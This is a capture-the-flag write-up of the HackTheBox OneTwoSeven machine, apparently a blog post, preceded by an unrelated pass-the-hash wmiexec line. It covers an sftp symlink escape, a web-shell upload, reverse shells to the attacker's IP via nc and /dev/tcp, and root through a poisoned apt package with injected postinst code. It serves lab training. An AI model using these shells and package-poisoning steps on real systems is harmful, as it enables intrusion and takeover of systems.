proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle

htb-onetwoseven-nl

This is the write-up of the OneTwoSeven machine from HackTheBox.

Target: 10.10.10.133 [OneTwoSeven]
System: Linux
Difficulty: [6/10]

Part I – User

nmap -sV -v 10.10.10.133

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 01:08 +03
NSE: Loaded 43 scripts for scanning.
Initiating Ping Scan at 01:08
Scanning 10.10.10.133 [2 ports]
Completed Ping Scan at 01:08, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:08
Completed Parallel DNS resolution of 1 host. at 01:08, 0.09s elapsed
Initiating Connect Scan at 01:08
Scanning 10.10.10.133 [1000 ports]
Discovered open port 22/tcp on 10.10.10.133
Discovered open port 80/tcp on 10.10.10.133
Increasing send delay for 10.10.10.133 from 0 to 5 due to 48 out of 159 dropped probes since last increase.
Completed Connect Scan at 01:08, 7.84s elapsed (1000 total ports)
Initiating Service scan at 01:08
Scanning 2 services on 10.10.10.133
Completed Service scan at 01:08, 6.14s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.133.
Initiating NSE at 01:08
Completed NSE at 01:08, 0.34s elapsed
Initiating NSE at 01:08
Completed NSE at 01:08, 0.00s elapsed
Nmap scan report for 10.10.10.133
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.11 seconds

Cool. After double checking it with a full port scan, we know that there is a web application on the machine.

It’s time to understand what this app does. Browsing to the IP address will help us.

web page

Someone made a beautiful web application for us. Great job. After visiting some pages on the website, I understood that this is a web service for generating personal websites for clients. Just look at that image. You will see some buttons in the header. Three buttons… The first one redirects to the home page. The second one shows statistics such as how many users are registered, open web sockets, etc.

stat page

The third button is the Admin button and it is currently disabled. We don’t know why it is disabled at the moment. Also, there is another button on the main page.

It says: Sign up today! Clicking it redirects to signup.php.

We are moving through…

signup page

Okay, we have some credentials now. The page also gives some information about them: these credentials are usable with the sftp service. There is another navigation link on this page. When we click the here link, it redirects to onetwoseven.htb/~ots-wOWM5YWM, and following it raises an “Unknown Host” error.

So, what we have from this page:

URL: http://onetwoseven.htb/~ots-wOWM5YWM
username: ots-wOWM5YWM
password: eb09c9ac

We can’t connect to that URL because our machine does not recognize that host. We should edit the /etc/hosts file and append 10.10.10.133 onetwoseven.htb to the bottom of it.

127.0.0.1	localhost
10.10.10.133	onetwoseven.htb

Then we visit http://onetwoseven.htb/~ots-wOWM5YWM again. There is a blank page with a background image. So, let’s think about what that app does. It creates personal web pages and serves them. We can probably upload our own files through sftp with the given credentials. Time to connect to the app via sftp:

sftp ots-wOWM5YWM@10.10.10.133

password: eb09c9ac

Connected to ots-wOWM5YWM@10.10.10.133.

The directory structure is shown below:

ls -la
drwxr-xr-x    3 0        0            4096 Jun  8 22:09 .
drwxr-xr-x    3 0        0            4096 Jun  8 22:09 ..
drwxr-xr-x    2 1003     1003         4096 Feb 15 21:03 public_html
sftp> cd public_html/
sftp> ls -la
drwxr-xr-x    2 1003     1003         4096 Feb 15 21:03 .
drwxr-xr-x    3 0        0            4096 Jun  8 22:09 ..
-rw-r--r--    1 1003     1003          349 Feb 15 21:03 index.html

If we upload a .php file here, maybe we can execute commands with it. Let’s try it out.

cd public_html
put test.php

Navigating to the test.php page in the browser gives a Forbidden response code. So we can’t upload a .php file; probably an .htaccess file blocks it.

I tried to upload an .htaccess file too, but got the same response. We have to try something different.

Let’s check which commands are executable on sftp service.

sftp> help
Available commands:
bye                                Quit sftp
cd path                            Change remote directory to 'path'
chgrp [-h] grp path                Change group of file 'path' to 'grp'
chmod [-h] mode path               Change permissions of file 'path' to 'mode'
chown [-h] own path                Change owner of file 'path' to 'own'
df [-hi] [path]                    Display statistics for current directory or
                                   filesystem containing 'path'
exit                               Quit sftp
get [-afPpRr] remote [local]       Download file
reget [-fPpRr] remote [local]      Resume download file
reput [-fPpRr] [local] remote      Resume upload file
help                               Display this help text
lcd path                           Change local directory to 'path'
lls [ls-options [path]]            Display local directory listing
lmkdir path                        Create local directory
ln [-s] oldpath newpath            Link remote file (-s for symlink)
lpwd                               Print local working directory
ls [-1afhlnrSt] [path]             Display remote directory listing
lumask umask                       Set local umask to 'umask'
mkdir path                         Create remote directory
progress                           Toggle display of progress meter
put [-afPpRr] local [remote]       Upload file
pwd                                Display remote working directory
quit                               Quit sftp
rename oldpath newpath             Rename remote file
rm path                            Delete remote file
rmdir path                         Remove remote directory
symlink oldpath newpath            Symlink remote file
version                            Show SFTP version
!command                           Execute 'command' in local shell
!                                  Escape to local shell
?                                  Synonym for help

The symlink command looks suspicious. If there is a lack of security in the chroot configuration, we may be able to symlink to other files with sftp. We should quickly test which files are accessible.

symlink / public_html/root

symlink /etc/passwd passwd

This command executed correctly, but there is no way of reading the file through the sftp service. There is something else, though: files are served on http://onetwoseven.htb/~ots-wOWM5YWM/.

Okay, good. We can read that passwd file from http://onetwoseven.htb/~ots-wOWM5YWM/passwd

Reading that file is pretty cool for user enumeration.

passwd

Interesting… There are 3 more users. They have their own home directories. The first one is interesting, right? It uses 127.0.0.1 as the connection address, so that user is the machine itself. Maybe we should find a way to escalate to that user. Before that, creating a symbolic link to that user’s directory could provide some information for that process.

symlink /home/web/ots-yODc2NGQ ots-yODc2NGQ

This command executed without any errors.

Let’s navigate that directory.

ots-yODc2NGQ

Woah! User flag is there. Is it that easy?

http://onetwoseven.htb/~ots-wOWM5YWM/ots-yODc2NGQ/user.txt

fail flag

Nah! Not that easy. Boo for you.

So, we should enumerate more to reach that user.

At that point, I enumerated some directories. It didn’t help until I found two juicy directories.

The first one is /var/www/html/. It redirects to the home page of http://10.10.10.133. If we create more specific symbolic links, we can read what the .php files on the home page do.

The second one is /var/www/html-admin.

I found these two directories by generating a symbolic link for /var/www.

Let’s start with the second one, it looks more interesting. When we browse into that directory, we see a .php.swp file lying there. Probably, someone was editing the login.php file, then something unexpected happened and a login.php.swp swap file was left behind.

After downloading it, all we have to do is run the necessary command to check what the file contains.

vim -r login.php.swp

Inspecting this file gives us two pieces of information.

First one:

Possibly, there is an application running locally on port 60080.

server port

Second one:

If there is an application running on port 60080, it has a login page and the authentication credentials are hard-coded.

login creds

At this point, hashkiller will help.

hash cracked

Great! We got the credentials needed to authenticate to that application.

username: ots-admin
password: Homesweethome1

Oh, what? We can’t access that port yet because it’s only listening locally. We have successfully gathered all the information from the /var/www/html-admin directory. Next, we will gather some information from the /var/www/html directory. As I said, if we directly generate a symlink for this directory, it redirects to the home page. What about generating symbolic links for the .php pages? It might be useful.

There are 4 php pages on web app. But these are interesting:

  • index.php
  • stats.php
  • signup.php

By the way, we can’t directly fetch them as .php files, because there is a restriction on opening .php files. So we will change their extensions to .php1 or something like that. Linking the .php files as .php1 lets us read their content without the server parsing them, so we can inspect their source code.

index.php1:

symlink /var/www/html/index.php index.php1

index source

Nothing. It enables the admin URL if SERVER_ADDR equals “127.0.0.1”.

stats.php1:

symlink /var/www/html/stats.php stats.php1

stats source

Nothing useful. It includes a txt file to show the server stats.

signup.php1:

symlink /var/www/html/signup.php signup.php1

signup source

Bingo! As you see, these lines show how the sftp credentials are generated.

If we replicate the same steps with the $ip variable set to 127.0.0.1, we can find the sftp password of that user.

onetwoseven.php:

<?php
function username() { $ip = '127.0.0.1'; return "ots-" . substr(str_replace('=','',base64_encode(substr(md5($ip),0,8))),3); }
function password() { $ip = '127.0.0.1'; return substr(md5($ip),0,8); }
echo username() . "\n" . password() . "\n";
?>

output:

ots-yODc2NGQ
f528764d

The username is identical to the first entry of the passwd file, so the password must be correct. Authenticating to the sftp service with these credentials should grant us permission to read that user.txt file.
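The same derivation in Python, as an added example that is not from the box or the original write-up: it reproduces the signup.php logic for any client IP and checks whether a username/password pair is consistent with the scheme. The security point is that both values are a pure function of the client IP, so anyone who knows (or can guess) that IP can compute the credentials; the two pairs checked are the ones from this write-up.

```python
import base64
import hashlib


def ots_password(ip: str) -> str:
    """Password = first 8 hex characters of md5(ip), as signup.php does."""
    return hashlib.md5(ip.encode()).hexdigest()[:8]


def ots_username(ip: str) -> str:
    """Username = 'ots-' + base64(password) with the '=' padding removed
    and the first three characters dropped, mirroring signup.php.
    Note the username is derived from the password, not independently."""
    b64 = base64.b64encode(ots_password(ip).encode()).decode().replace("=", "")
    return "ots-" + b64[3:]


def ots_credentials(ip: str) -> tuple:
    """(username, password) pair the signup page hands to a client at `ip`."""
    return ots_username(ip), ots_password(ip)


def username_matches_password(username: str, password: str) -> bool:
    """True when `username` is exactly what the scheme derives from
    `password`; i.e. the pair could have been issued by signup.php."""
    b64 = base64.b64encode(password.encode()).decode().replace("=", "")
    return username == "ots-" + b64[3:]


if __name__ == "__main__":
    # The loopback client: the machine's own account from the passwd file.
    print(ots_credentials("127.0.0.1"))
    # The pair the signup page issued in the write-up, checked for consistency.
    print(username_matches_password("ots-wOWM5YWM", "eb09c9ac"))
```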

Let’s validate it.

sftp ots-yODc2NGQ@10.10.10.133

password: f528764d

Cool. We got that user.txt file.

[screenshot: successful sftp login]

One more step:

cat user.txt
93a4ce6d82bd35da033206ef98b486f4

We got the user.txt file. The whole process was not that tricky; all we did was some enumeration. Nothing more. Now we are aiming for root access.

Part II – Root

From the last part, we have some credentials to use.

The sftp service is running on port 22, and sftp is a subsystem of ssh. What happens if we try to connect to the SSH service with the previous credentials?

ssh ots-yODc2NGQ@10.10.10.133
ots-yODc2NGQ@10.10.10.133's password: 
This service allows sftp connections only.
Connection to 10.10.10.133 closed.

Connection closed. Anyway, it feels like we are on the correct path. If we can reach port 60080 through an SSH tunnel, we can go further.

Here we go.

ssh -L 60080:127.0.0.1:60080 ots-yODc2NGQ@10.10.10.133
ots-yODc2NGQ@10.10.10.133's password: 
This service allows sftp connections only.
Connection to 10.10.10.133 closed.

We can also make the command verbose with the -v parameter. I used that parameter too. I saw that the SSH connection can be used for sftp only. That’s bad, right? After reading the SSH man page, I figured out there is a useful argument called -s. If you want to make that connection over a subsystem, you should use the -s parameter.

ssh -L 60080:127.0.0.1:60080 ots-yODc2NGQ@10.10.10.133 -s sftp

Great! It’s not showing any messages, but that is okay. Now we browse to port 60080. Before that, editing the /etc/hosts file can help if you want to use a hostname instead of “127.0.0.1”.

127.0.0.1	localhost
10.10.10.133	onetwoseven.htb
127.0.0.1	saiyajin

Now, we are ready.

http://saiyajin:60080

[screenshot: login panel on port 60080]

Thanks to the creator of the machine, the login panel is right there. We don’t have to enumerate for it.

We have necessary credentials to move forward.

username: ots-admin
password: Homesweethome1

[screenshot: admin panel menu]

Okay, I’m pretty sure that what we see is the admin panel. I just clicked OTS Users before taking the screenshot. There are some modules installed on the panel. Uploading a plugin is disabled for security reasons. Great. This admin manager is pretty interesting. I inspected the application.

Here are my findings:

  • If you want to run a plugin, you use the “menu.php?addon=addons/addon-name.php” URI.
  • If you want to see the content of a plugin, you use the “addon-download.php?addon=addon-name.php” URI.
  • Navigating to the “OTS Addon Manager” link shows that there are some rewrite rules for the “addon-download.php” and “addon-upload.php” files.
  • Navigating to the “addon-download.php” page returns a blank page.
  • Navigating to the “addon-upload.php” page returns a “404 Not Found” page.

You can also read the content of the ots-man-addon.php page by downloading it.

ots-man-addon.php:

[screenshot: ots-man-addon.php source]

So, we have to deceive the system. On my first try, it took me a while to understand.

This is what your request should look like:

[screenshot: Burp request]

We included the addon-upload.php file through the addon parameter of addon-download.php, and attached a file to the same request. Time to test it!

HTTP/1.1 302 Found
Date: Sun, 09 Jun 2019 01:51:34 GMT
Server: Apache/2.4.25 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /menu.php
Content-Length: 27
Connection: close
Content-Type: text/plain;charset=UTF-8

File uploaded successfull.y

So, our filename was onetwoseven.php. Now we can run commands by following this URL: http://saiyajin:60080/addons/onetwoseven.php?cmd=ls -la

[screenshot: command output in the browser]

Okay, we got a shell, but it is just a web shell; it’s not even interactive. We should get a better shell to execute commands and enumerate the system properly.

Host machine:

nc -lvp 9292

Target machine:

http://saiyajin:60080/addons/onetwoseven.php?cmd=nc+-e+/bin/sh+10.10.15.127+9292

Host machine output:

Connection from 10.10.10.133:36800
┌─[puck@parrot-lt]─[~/htb/onetwoseven]
└──╼ $curl http://localhost:60080/addons/cmd.php?cmd=id
uid=35(www-admin-data) gid=35(www-admin-data) groups=35(www-admin-data)

curl: (3) URL using bad/illegal format or missing URL
┌─[✗]─[puck@parrot-lt]─[~/htb/onetwoseven]
└──╼ $curl -G http://localhost:60080/addons/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.12/4444 0>&1'"

Okay, cool. We got a better shell, but it’s not enough. We should upgrade it further.

python -c "import pty;pty.spawn('/bin/bash')"
export TERM=linux

Finally, we gained a tty shell. The second command is necessary if you want to use the clear command in your shell.

During the enumeration process, I found one cool thing. It was the output of the sudo -l command. That command shows which commands the current user can execute with sudo privileges.

Matching Defaults entries for www-admin-data on onetwoseven:
    env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy",
    mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-admin-data may run the following commands on onetwoseven:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade

Very nice, we can run the /usr/bin/apt-get update and /usr/bin/apt-get upgrade commands with root privileges. That’s okay. So, we have to inject something into these commands. This part was pretty tricky for me. I read two articles for this part and I will share them at the end of this blog post. You should read both of these articles. They contain very cool tricks.

If you check the output of the sudo -l command, you can see that some environment variables are kept (env_keep), and they can be used to point the machine at your local host as a proxy server. These are:

  • ftp_proxy
  • http_proxy
  • https_proxy
  • no_proxy

Before using these variables, I decided to enumerate the apt repositories on the machine.

We can check the repository list by reading the sources.list file located in the /etc/apt directory.

cat /etc/apt/sources.list

# deb cdrom:[devuan_ascii_2.0.0_amd64_netinst]/ ascii main non-free

#deb cdrom:[devuan_ascii_2.0.0_amd64_netinst]/ ascii main non-free

deb http://de.deb.devuan.org/merged ascii main
# deb-src http://de.deb.devuan.org/merged ascii main

deb http://de.deb.devuan.org/merged ascii-security main
# deb-src http://de.deb.devuan.org/merged ascii-security main

deb http://de.deb.devuan.org/merged ascii-updates main
# deb-src http://de.deb.devuan.org/merged ascii-updates main

Some of these lines are commented out. If we run the apt-get update command, the machine will probably try to connect to that host. Then it will try to find differences between the installed package list and the repository’s package list. After reading that post, I figured out how it finds the differences.

All packages are stored in .deb format in the repository, and the repository also carries index files for package control. If you want to publish an updated package, you must hash that .deb file with three different algorithms:

  • MD5
  • SHA1
  • SHA256

After computing the checksums, you have to place these hash values in the latest version of the Packages file. This is strictly necessary: when a package is upgraded, apt compares the hash values in the Packages file with the hash values of the downloaded .deb file, and if they don’t match, the upgrade fails.

You also have to compress the Packages file in .gz format. After compressing it, you must run another checksumming pass over both the Packages and Packages.gz files. These hash values are stored in the Release file. The Release file lists every Packages file of the repository, which is why it sits at the top of the repository tree. In short: the Release file references the Packages files, and the Packages files store the hashes of the .deb packages. One more detail about repositories is that the Release file can be signed with the key of the repository’s authority. That was a small briefing on how repositories work.

Okay, we got it. Let’s start by executing the update command.

sudo /usr/bin/apt-get update

Err:1 http://packages.onetwoseven.htb/devuan ascii InRelease
  Temporary failure resolving 'packages.onetwoseven.htb'
Err:2 http://de.deb.devuan.org/merged ascii InRelease
  Temporary failure resolving 'de.deb.devuan.org'
Err:3 http://de.deb.devuan.org/merged ascii-security InRelease
  Temporary failure resolving 'de.deb.devuan.org'
Err:4 http://de.deb.devuan.org/merged ascii-updates InRelease
  Temporary failure resolving 'de.deb.devuan.org'
Reading package lists... Done
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii/InRelease  Temporary failure resolving 'de.deb.devuan.org'
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-security/InRelease  Temporary failure resolving 'de.deb.devuan.org'
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-updates/InRelease  Temporary failure resolving 'de.deb.devuan.org'
W: Failed to fetch http://packages.onetwoseven.htb/devuan/dists/ascii/InRelease  Temporary failure resolving 'packages.onetwoseven.htb'
W: Some index files failed to download. They have been ignored, or old ones used instead.

As you can see, the connection failed. Inspect that output more carefully: the first error shows another package repository.

packages.onetwoseven.htb

If you try to open these repositories from your browser, you will see that the one starting with packages fails, because your browser won’t resolve that hostname. The other one redirects to another URL.

deb.devuan.org

[screenshot: redirect path of deb.devuan.org]

Somehow, we should make that connection possible from the target machine. We know there are some environment variables that can help at this point.

export http_proxy=http://10.10.15.127

Now, it’s time to test it.

sudo /usr/bin/apt-get update

Err:1 http://packages.onetwoseven.htb/devuan ascii InRelease
  Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
Err:2 http://de.deb.devuan.org/merged ascii InRelease
  Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
Err:3 http://de.deb.devuan.org/merged ascii-security InRelease
  Unable to connect to 10.10.15.127:http:
Err:4 http://de.deb.devuan.org/merged ascii-updates InRelease
  Unable to connect to 10.10.15.127:http:
Reading package lists... Done
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii/InRelease  Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-security/InRelease  Unable to connect to 10.10.15.127:http:
W: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-updates/InRelease  Unable to connect to 10.10.15.127:http:
W: Failed to fetch http://packages.onetwoseven.htb/devuan/dists/ascii/InRelease  Could not connect to 10.10.15.127:80 (10.10.15.127). - connect (111: Connection refused)
W: Some index files failed to download. They have been ignored, or old ones used instead.

Good, there are some changes in the output. It is probably trying to connect to our HTTP service. Let’s deceive it by running SimpleHTTPServer on the local machine.

python2 -m SimpleHTTPServer 80

Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.133 - - [10/Jun/2019 00:32:09] code 404, message File not found
10.10.10.133 - - [10/Jun/2019 00:32:09] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/InRelease HTTP/1.1" 404 -
10.10.10.133 - - [10/Jun/2019 00:32:09] code 404, message File not found
10.10.10.133 - - [10/Jun/2019 00:32:09] "GET http://de.deb.devuan.org/merged/dists/ascii/InRelease HTTP/1.1" 404 -

.... other lines ....

10.10.10.133 - - [10/Jun/2019 00:32:09] code 404, message File not found
10.10.10.133 - - [10/Jun/2019 00:32:09] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages.xz HTTP/1.1" 404 -

Basically, it tries to fetch some files, but these files are not there. We have to build something bigger. Maybe we should create our own repositories under the given hostnames.

First, we should edit the /etc/hosts file and append the lines shown below.

127.0.0.1	packages.onetwoseven.htb
127.0.0.1	de.deb.devuan.org

The first step is done. The second step is creating these repositories. At that point, I created two different directories, because the update command fetches update files from two different URLs.

Here’s the directory structure:

[screenshot: directory structure of the two repositories]

If you check the output of the last update command, you will see that the packages.onetwoseven.htb host uses the /devuan directory and the other one uses the /merged directory. We know that de.deb.devuan.org is a real repository, but the other one isn’t. So we have to fetch the same files from the real repository to make ours look real. I fetched these files with wget into the merged directory. Okay, we are done with the real one.

What about the fake one?

The fake repository should be our injection directory. We have to find an application on the target machine that belongs to the /devuan repository. If we can find one, then we can inject code into that Debian package.

Ain’t that cool? We are upgrading an application for real, then generating the necessary Release and Packages files for it, and hiding our surprise for the user.

Before finding that application, I removed some Release and Packages files from the real repository we created. If the update process finds any differences between the repository and the installed package list, it will try to upgrade those packages too, and if they are not stored in the repo’s pool, the process will fail.

Let’s find my precioussss….

dpkg -l | grep 'devuan'

ii  base-files                             9.9+devuan2.5                      all          Devuan base system miscellaneous files
ii  bash-completion                        1:2.1-4.3+devuan1                  all          programmable completion for the bash shell
ii  bsdutils                               1:2.29.2-1+devuan2.1               amd64        basic utilities from 4.4BSD-Lite
ii  dbus                                   1.10.22-1+devuan2                  amd64        simple interprocess messaging system (daemon and utilities)
ii  devuan-baseconf                        0.6.4+devuan2.3                    all          Devuan base config files

...

From the results, I decided to select the base-files package, because I saw that this file is stored in the real repository. I downloaded the “deb” package with the same version as the currently installed one.

The real fun begins..

dpkg-deb -R base-files_9.9+devuan2.5_all.deb modified_base_files

We extract the contents of the .deb with this command. After extracting it, we navigate to the DEBIAN directory inside it. Then we inject our malicious code into the postinst file. We selected this file because all of its lines are executed while running the /usr/bin/apt-get upgrade command.

[screenshot: modified postinst file]

By the way, I switched to Kali Linux at that point, because deb is not installed on my operating system. We also have to change the version in the DEBIAN/control file.

[screenshot: modified control file]

After making these changes, we repack it.

dpkg-deb -b modified_base_files/ base-files_9.9+devuan2.6_all.deb

Cool! We still have some work to do. Let’s create the Packages, Packages.gz and Release files.

Packages file:

md5sum base*; sha1sum base*; sha256sum base*;

output:

4889411ad723b5c6d56c7c47ad381cb7  base-files_9.9+devuan2.6_all.deb
338fc54417db2194e2023d721b065ad310fbe4cf  base-files_9.9+devuan2.6_all.deb
06a21aa67d8afc106ac14f037a7b9adeabc04e35c09b5e96057dccc2bb8a3ee3  base-files_9.9+devuan2.6_all.deb

We have to save these hashes and the file size into the Packages file as shown below.

Package: base-files
Version: 9.9+devuan2.6
Essential: yes
Installed-Size: 368
Maintainer: Evilham <devuan@evilham.com>
Architecture: all
Replaces: base, dpkg (<= 1.15.0), miscutils
Provides: base
Pre-Depends: awk
Breaks: initscripts (<< 2.88dsf-13.3), sendfile (<< 2.1b.20080616-5.2~)
Description: Devuan base system miscellaneous files
 This package contains the basic filesystem hierarchy of a Devuan system, and
 several important miscellaneous files, such as /etc/devuan_version,
 /etc/host.conf, /etc/issue, /etc/motd, /etc/profile, and others, and the text
 of several common licenses in use on Devuan systems.
Description-md5: 7271d96af8aac4f5f37c86c0f2c8cda6
Multi-Arch: foreign
Section: admin
Priority: required
Filename: pool/DEVUAN/main/b/base-files/base-files_9.9+devuan2.6_all.deb
Size: 68796
MD5sum: 4889411ad723b5c6d56c7c47ad381cb7
SHA1: 338fc54417db2194e2023d721b065ad310fbe4cf
SHA256: 06a21aa67d8afc106ac14f037a7b9adeabc04e35c09b5e96057dccc2bb8a3ee3

Packages.gz file:

gzip Packages -c > Packages.gz

Release file:

Let’s gather hash values and file sizes.

md5sum Packages*; sha1sum Packages*; sha256sum Packages*;

output:

55bd31c447c782f4836ed2238a6b066f  Packages
8def1f355c5154fe4150e821e57d8743  Packages.gz
ce136bde8a0d91766104881735ae9d4ff40df125  Packages
c3946b74c76880a4b71f147714bacbb2a47e112f  Packages.gz
445ba0fe10fcf80433e1725bb80005b69a6946464c8760ad9063dd3b7e527a51  Packages
776053770b7228e18baf41631c6c9c7c95c4d54d2edc9fca30f408f60b175ef4  Packages.gz

ls -la | grep 'Packages*'

-rw-r--r-- 1 root root  967 Haz  8 22:31 Packages
-rw-r--r-- 1 root root  634 Haz  8 22:31 Packages.gz

We need to save these hashes and the sizes of the Packages and Packages.gz files into the Release file as shown below:

Origin: Devuan
Label: ascii
Suite: ascii
Version: 2.0.0
Codename: ascii
Date: Sat, 08 Jun 2019 01:27:04 UTC
Valid-Until: Sat, 15 Jun 2019 01:27:04 UTC
Architectures: alpha amd64 arm64 armel armhf hppa i386 ia64 mips mipsel powerpc ppc64el s390x sparc
Components: main contrib non-free raspi beaglebone droid4 n900 n950 n9 sunxi exynos
MD5Sum:
 55bd31c447c782f4836ed2238a6b066f 967 main/binary-amd64/Packages
 8def1f355c5154fe4150e821e57d8743 634 main/binary-amd64/Packages.gz
SHA1:
 ce136bde8a0d91766104881735ae9d4ff40df125 967 main/binary-amd64/Packages
 c3946b74c76880a4b71f147714bacbb2a47e112f 634 main/binary-amd64/Packages.gz
SHA256:
 445ba0fe10fcf80433e1725bb80005b69a6946464c8760ad9063dd3b7e527a51 967 main/binary-amd64/Packages
 776053770b7228e18baf41631c6c9c7c95c4d54d2edc9fca30f408f60b175ef4 634 main/binary-amd64/Packages.gz
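The hash chain described in the repository briefing above and the Packages/Release files built by hand in this section, as an added Python example (not code from the post): it indexes a constructed stand-in .deb the same way and then verifies Release → Packages → .deb as apt does. The .deb bytes, the hash-sections-only Release format and the function names are my assumptions; the paths are the ones used on this page. The point for a defender is the last test case: a consistent chain can be regenerated over any payload, so hash agreement says nothing about origin unless the Release file is signed.

```python
import gzip
import hashlib

# Constructed stand-in for a .deb (not a real package); apt only ever hashes bytes.
DEB_PATH = "pool/DEVUAN/main/b/base-files/base-files_9.9+devuan2.6_all.deb"
DEB_BYTES = b"!<arch>\n" + b"A" * 200            # constructed sample content
PACKAGES_PATH = "main/binary-amd64/Packages"

def digests(data: bytes) -> dict:
    """Size plus the three digests apt compares (the size is checked first)."""
    return {"Size": len(data), "MD5sum": hashlib.md5(data).hexdigest(),
            "SHA1": hashlib.sha1(data).hexdigest(), "SHA256": hashlib.sha256(data).hexdigest()}
def packages_index(pkg: str, version: str, filename: str, deb: bytes) -> bytes:
    """Minimal Packages stanza: the fields apt uses to fetch and verify a .deb."""
    d = digests(deb)
    return (f"Package: {pkg}\nVersion: {version}\nArchitecture: all\n"
            f"Filename: {filename}\nSize: {d['Size']}\nMD5sum: {d['MD5sum']}\n"
            f"SHA1: {d['SHA1']}\nSHA256: {d['SHA256']}\n\n").encode()
def release_index(files: dict) -> str:
    """Release hash sections: one '<hash> <size> <path>' line per index file and algorithm."""
    lines = []
    for algo, key in (("MD5Sum", "MD5sum"), ("SHA1", "SHA1"), ("SHA256", "SHA256")):
        lines.append(f"{algo}:")
        for path, data in files.items():
            d = digests(data)
            lines.append(f" {d[key]} {d['Size']} {path}")
    return "\n".join(lines) + "\n"
def parse_release(text: str) -> dict:
    """{path: {algo: (hash, size)}} from the hash sections of a Release file."""
    entries, algo = {}, None
    for line in text.splitlines():
        if line.endswith(":") and not line.startswith(" "):
            algo = line[:-1]
        elif line.startswith(" ") and algo:
            h, size, path = line.split()
            entries.setdefault(path, {})[algo] = (h, int(size))
    return entries
def parse_packages(text: str) -> dict:
    """Field map of a one-stanza Packages file (continuation lines skipped)."""
    fields = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith(" "):
            key, value = line.split(":", 1)
            fields[key] = value.strip()
    return fields
def verify_chain(release: str, packages: bytes, deb: bytes) -> str:
    """Walk Release -> Packages -> .deb as apt does; return 'ok' or the failing link.
    A pass only shows the files agree with each other; only a signature over Release
    (Release.gpg or InRelease) says who produced them."""
    want = parse_release(release).get(PACKAGES_PATH, {}).get("SHA256")
    got = digests(packages)
    if want != (got["SHA256"], got["Size"]):
        return "Packages does not match Release"
    fields, d = parse_packages(packages.decode()), digests(deb)
    if (fields.get("SHA256"), int(fields.get("Size", -1))) != (d["SHA256"], d["Size"]):
        return ".deb does not match Packages"
    return "ok"
def build_repo(deb: bytes = DEB_BYTES) -> tuple:
    """Index one .deb the way the post does by hand: Packages, Packages.gz, Release."""
    packages = packages_index("base-files", "9.9+devuan2.6", DEB_PATH, deb)
    packages_gz = gzip.compress(packages)
    release = release_index({PACKAGES_PATH: packages, PACKAGES_PATH + ".gz": packages_gz})
    return release, packages, packages_gz
```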

Everything is ready, so we can start the show!

Let’s execute the /usr/bin/apt-get update and /usr/bin/apt-get upgrade commands.

[screenshot: apt-get update output]

As you can see, there is only one package ready to upgrade.

[screenshot: apt-get upgrade listing base-files]

Connection received. But who am I?

[screenshot: root shell]

uid=0(root) gid=0(root) groups=0(root)
root.txt = 2d380a25a8e3bfc095abd9e691841048

After a long effort, we finally got the root user.

Articles:

  • https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/
  • https://versprite.com/blog/apt-mitm-package-injection/